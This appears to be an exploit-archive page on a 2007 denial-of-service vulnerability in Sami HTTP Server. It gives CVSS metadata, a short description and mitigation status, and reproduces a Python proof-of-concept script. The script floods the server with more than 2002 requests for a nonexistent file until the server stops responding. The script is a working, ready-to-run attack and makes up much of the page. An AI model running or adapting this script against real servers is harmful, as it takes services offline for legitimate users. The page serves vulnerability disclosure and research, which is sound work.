header-logo
Suggest Exploit
vendor:
Sami HTTP Server
by:
shinnai
5.5
CVSS
MEDIUM
Denial-of-Service
400
CWE
Product Name: Sami HTTP Server
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sami HTTP Server Denial-of-Service Vulnerability

The vulnerability allows remote attackers to crash the Sami HTTP Server application, denying further service to legitimate users. By sending a large number of requests to non-existent files, pages, or folders, the server becomes unresponsive and stops writing to log files. The admin will be unable to manage or ban users, and the only solution is to kill the process.

Mitigation:

No known mitigation is available for this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22159/info

Sami HTTP Server is prone to a remote denial-of-service vulnerability.

Exploiting this issue allows remote attackers to crash the server application, denying further service to legitimate users.

import socket

print "-------------------------------------------------------------------------------------------------------"
print "Sami HTTP Server HTTP 404 - Object not found Denial of Service"
print "url: http://www.karjasoft.com"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print ""
print "The server is unable to handle more than 2002 requests to nonexistents"
print "files, pages, folders etc."
print "When the number of requests exceed the 2002, it stops to answer, stops"
print "to write to log file and the admin will be unable to kick or ban users."
print "The only thing you can do is to kill the process."
print "-------------------------------------------------------------------------------------------------------"

host = "127.0.0.1"
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   conn = s.connect(("127.0.0.1",80))
   for i in range (0,2004):
       request =  "GET /some.txt HTTP/1.0 \n\n"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       print i
except:
   print "Unable to connect. exiting."

Navigation

Suggest Exploit

Services By CQR